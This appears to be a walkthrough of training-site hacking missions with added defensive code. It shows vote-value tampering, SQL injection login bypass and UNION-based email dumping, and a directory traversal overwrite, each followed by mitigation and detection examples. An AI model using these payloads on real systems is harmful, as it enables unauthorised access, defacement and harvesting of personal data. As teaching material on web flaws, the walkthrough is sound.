1. Uncle Arnold's Local Band Review
So this dude's band is in last place, what a noob ;o
Well, let's help him out anyway :)
Make sure you have the Firebug addon, it's very useful. Let's have a look at the voting part.
Click the inspect button and then click on the dropdown for voting:
Code:
<select name="vote">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
Click on the 1 in value="1" and change it to a big number (100000, for example). Press the vote button and you're done :)
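For anyone wondering why editing the option value works: the <select> only limits what the browser offers, not what the server accepts. Below is an added example (not code from the mission or from this post) of what a server-side vote handler should do about it. The tally storage and function names are assumed for the example.

```python
# Added example: server-side validation of the 'vote' form field.
# The band tally is an in-memory dict here (assumed, not the real back end).

ALLOWED_VOTES = {"1", "2", "3", "4", "5"}  # exactly the options the form renders


class VoteRejected(ValueError):
    """Raised when the submitted vote is not one of the values the form offers."""


def parse_vote(raw):
    """Strictly parse the submitted 'vote' field.

    Only the literal strings "1".."5" are accepted. Edited option values,
    negatives, floats, huge numbers and empty strings are all rejected,
    regardless of what the HTML form said the choices were.
    """
    if not isinstance(raw, str) or raw not in ALLOWED_VOTES:
        raise VoteRejected("vote must be one of 1-5")
    return int(raw)


def record_vote(tally, band, raw_vote):
    """Apply one vote to the tally; returns (accepted, band's current score).

    A rejected vote leaves the score unchanged instead of trusting the client.
    """
    try:
        value = parse_vote(raw_vote)
    except VoteRejected:
        return False, tally.get(band, 0)
    tally[band] = tally.get(band, 0) + value
    return True, tally[band]


if __name__ == "__main__":
    tally = {}
    print(record_vote(tally, "band-x", "5"))       # (True, 5)
    print(record_vote(tally, "band-x", "100000"))  # (False, 5): tampered value ignored
```

The allow-list is deliberately a set of strings rather than a numeric range check, so there is no int() call on attacker-controlled input before the value has been accepted.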
2. Chicago American Nazi Party
Ah, what's that? Lame racist people? :o HAX!
First thing we're gonna do is check the page's source.
Near the bottom it says:
Code:
<a href="update.php"><font color="#000000">update</font></a>
Press Ctrl+A on the main page and you'll see the hidden 'update' link :) Click on it.
Hmm, a login form :o
Let's enter the name of one of the fishes that posted (I took Jones).
Let's try whether it's vulnerable to SQL injection:
username:
Jones'--
password:
djfhsjkfhjkfh
Wooo, we're in.
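Why does a quote and two dashes log you in? The login script splices the form fields straight into its SQL, so the quote closes the username literal and -- comments out the password check. Here is an added example (my own code, not the mission's update.php) showing that broken pattern next to a hardened version; the table layout, user row and password are constructed for the example.

```python
import hashlib
import hmac
import os
import sqlite3

# Added example: a string-built login query beside a parameterised one.
# Tables, rows and the password are constructed; they are not the mission's data.


def make_db():
    """In-memory database with one user stored two ways: plaintext for the
    vulnerable handler, salted PBKDF2 for the hardened one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_plain (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"correct-horse", salt, 100_000)
    conn.execute("INSERT INTO users_plain VALUES (?, ?)", ("Jones", "correct-horse"))
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", ("Jones", salt, pw_hash))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query (the flaw): user input becomes part of the SQL text,
    so a quote ends the literal and '--' turns the rest into a comment."""
    sql = ("SELECT 1 FROM users_plain WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    """Parameterised lookup, then a constant-time hash comparison.

    The username is bound as data, so quotes and '--' never reach the SQL
    parser; the password never appears in the query at all.
    """
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "Jones'--", "anything"))  # True: password check commented out
    print(login_hardened(db, "Jones'--", "anything"))    # False: treated as a literal username
    print(login_hardened(db, "Jones", "correct-horse"))  # True
```

Binding parameters fixes the injection; hashing fixes the second flaw the vulnerable version has, which is that it can only work at all if passwords are stored in plaintext.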
3. Peace Poetry: HACKED
This one was a pain in the ass.
The keyword to solve this one is directory traversal (see basic 8 and 9).
View the page source of the haxxored page. Hmm, it's all cluttered up on one line, but there's a massive scrollbar :o
Scroll down :)
Code:
<!--Note to the webmasterThis website has been hacked, but not totally destroyed. The old website is still up. I simply copied the old index.html file to oldindex.html and remade this one. Sorry about the inconvenience.-->
Go to oldindex.html's source, press Ctrl+A and copy it all.
Now click the submit poem button; we're gonna use directory traversal to overwrite the old index.html!
name:
Code:
../index.html
poem:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head> <title>peace be with all</title></head><body background="bg.jpg" text='#FFFFFF' link="#FFF833" vlink="#FFF833"><center><font face="verdana" size=7><b>Peace Poetry</b></font><table cellspacing=0 border=0 cellpadding=0 align="center" width=760><tr><td width=230><font face="verdana" size=2><b>"What difference does it make to the dead, the orphans and the homeless, whether the mad destruction is wrought under the name of totalitarianism or the holy name of liberty and democracy?" - Mahatma Gandi<br /><br />"A war is not won if the defeated enemy has not been turned into a friend."</b></font></td><td width=300 valign="top"><img src="peace.jpg" width=297 height=300></td><td width=230><font face="verdana" size=2><b>"The greatest purveyor of violence in the world today is my own government. For the sake of hundreds of thousands trembling under our violence, I cannot be silent." - Martin Luther King Jr.<br /><br />"The nationalist not only does not disapprove of atrocities committed by his own side, but he has a remarkable capacity for not even hearing about them." - George Orwell</b></font></td></tr></table><table width=600 cellspacing=0 cellpadding=0 border=0 align="center"><tr><td><font face="verdana" size=3><b>Welcome to Peace Poetry. This website features several poems crying out for freedom, liberty, justice, peace, love and understanding. You can also submit your own poetry!<br /><br /><center><a href="readpoems.php">Read The Poetry</a> | <a href="submitpoems.php">Submit Poetry</a><br /><br /></center></b></font></td></tr></table></center></body></html>
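The submit script takes the poem name and uses it as a file name, which is why ../index.html lands in the web root. As an added example (not the mission's submitpoems.php), here is how a poem-saving routine should pin the file inside its own directory; the poems/ layout and function names are assumed.

```python
import os
import re
import tempfile

# Added example: mapping a user-supplied poem name to a file path safely.
# Directory layout (site root with index.html and poems/) is constructed.

NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class UnsafeName(ValueError):
    """Raised when a submitted name would not stay inside the poems directory."""


def is_safe_name(name):
    """Allow-list check: letters, digits, '_' and '-' only; no dots or slashes."""
    return NAME_RE.fullmatch(name) is not None


def poem_path(poems_dir, submitted_name):
    """Resolve a submitted name to a path that is guaranteed to be inside poems_dir.

    Two independent defences: (1) the character allow-list keeps separators
    and '..' out entirely; (2) a resolved-path containment check means that
    even a bug in (1) cannot produce a write outside the directory.
    """
    if not is_safe_name(submitted_name):
        raise UnsafeName("name contains disallowed characters")
    base = os.path.realpath(poems_dir)
    target = os.path.realpath(os.path.join(base, submitted_name + ".txt"))
    if os.path.commonpath([base, target]) != base:
        raise UnsafeName("resolved path escapes the poems directory")
    return target


def save_poem(poems_dir, submitted_name, body):
    """Write the poem; returns the path written, or None if the name was rejected."""
    try:
        target = poem_path(poems_dir, submitted_name)
    except UnsafeName:
        return None
    with open(target, "w", encoding="utf-8") as fh:
        fh.write(body)
    return target


def demo():
    """Constructed scenario: one legitimate submission, one traversal attempt.

    Returns (legit_saved, traversal_rejected, index_untouched).
    """
    root = tempfile.mkdtemp()
    poems = os.path.join(root, "poems")
    os.mkdir(poems)
    index = os.path.join(root, "index.html")
    with open(index, "w", encoding="utf-8") as fh:
        fh.write("<html>original</html>")
    legit = save_poem(poems, "peace", "poem text")
    bad = save_poem(poems, "../index.html", "<html>replaced</html>")
    with open(index, encoding="utf-8") as fh:
        untouched = fh.read() == "<html>original</html>"
    return legit is not None, bad is None, untouched


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```

The realpath step matters because symlinks and normalised components like "a/../b" are only visible after resolution; checking the raw string alone is what the allow-list is for.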
First thing you wanna do is check out all the links.
The two links on the page use GET (they retrieve data from the database).
The submit email button uses POST.
Now if you submit something random you'll see:
Code:
Error inserting into table "email"! Email not valid! Please contact an administrator of Fischer's
Go to the category page, and in the URL right after catagory=1 paste this:
Code:
UNION ALL SELECT NULL, *, NULL, NULL FROM email;
Press enter and voila, the list of emails is at the bottom of the page! :)
Now copy them over to Notepad, make it one email per line, then send a private message to SaveTheWhales with the emails as the message content and you're done! :)
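The UNION works because the category parameter goes into the query as text instead of as a number. As an added example from the other side of the fence (my own code, not the mission's), here is a small access-log scanner that flags requests where a parameter the app expects to be an integer isn't one, next to the strict parse the app should have done. The log lines, hostnames and the parameter name "category" are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Added example: detection over constructed access-log lines plus the
# strict integer parse that would have blocked the request in the first place.
# IPs, timestamps, paths and the parameter name are all constructed.

SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2008:10:01:02 +0000] "GET /products.php?category=1 HTTP/1.1" 200 2311
10.0.0.5 - - [12/Mar/2008:10:01:09 +0000] "GET /products.php?category=2 HTTP/1.1" 200 2290
10.0.0.9 - - [12/Mar/2008:10:02:41 +0000] "GET /products.php?category=1%20UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email HTTP/1.1" 200 4870
10.0.0.9 - - [12/Mar/2008:10:02:55 +0000] "GET /products.php?category=1' HTTP/1.1" 500 312
"""

# Common log format: ip ident user [time] "method path proto" status size
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Parameters the application expects to be plain integers.
INTEGER_PARAMS = {"category"}
# Tokens that make a non-integer value look like SQL rather than a typo.
SQL_HINT = re.compile(r"\b(union|select|from)\b|--|['\";]", re.IGNORECASE)


def parse_param(value):
    """Mitigation: accept only a plain non-negative integer string, else None.

    The application should do this before the value goes anywhere near SQL
    (and still bind it as a parameter afterwards).
    """
    return int(value) if value.isdigit() else None


def scan_access_log(text):
    """Detection: flag requests whose integer parameters are not integers.

    Returns a list of (client_ip, status, param, decoded_value, looks_like_sql).
    """
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status = m.groups()
        # parse_qsl percent-decodes the values, so '%20UNION%20' becomes ' UNION '.
        for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            if name in INTEGER_PARAMS and parse_param(value) is None:
                findings.append((ip, int(status), name, value,
                                 SQL_HINT.search(value) is not None))
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Keying the rule on the expected type of each parameter, rather than on a keyword blacklist alone, also catches the 500 from the lone quote on the last line, which a UNION-only signature would miss.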